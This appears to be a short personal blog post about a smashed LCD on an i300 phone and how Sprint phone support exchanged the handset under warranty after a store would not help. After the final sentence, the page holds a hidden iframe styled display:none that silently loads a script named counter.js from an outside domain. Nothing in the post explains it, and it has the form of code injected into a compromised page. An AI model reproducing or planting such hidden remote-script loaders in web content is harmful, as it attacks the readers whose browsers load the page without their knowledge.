Back in June the LCD on my i300 was smashed. I used the phone just before leaving work on a Tuesday and on Wednesday morning when I pulled it out of my case it looked as if a rock had been smashed into the middle of the LCD.

I am guessing it got pinched by my seatbelt or fell off the counter at home.
The LCD crack prevented the use of the phone after my first alarm activated (I could not dismiss it since the touchscreen functionality was gone).
I did not have the $4 insurance program.
I stopped at my local Sprint store and asked where I could have my i300 repaired. The folks at the Sprint store were not interested in repairing the phone. They could not provide me any information about who I could contact for repairs.
Once home I called Sprint (you know Claire and all). The customer service rep informed that my i300 was still "under warranty". I explained that the phone was damaged due to my negligence. She told me that it was "under warranty" and that I could exchange the phone for a new one.
They sent me a new phone, charge my account, and sent me a return UPS mailer. I used the return mailer to send the damaged phone back and they credited my account. I had the new phone in 2 days.
I feel lucky! Needless to say I have since added the $4 protection plan for when my phone is no longer "under warranty".<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
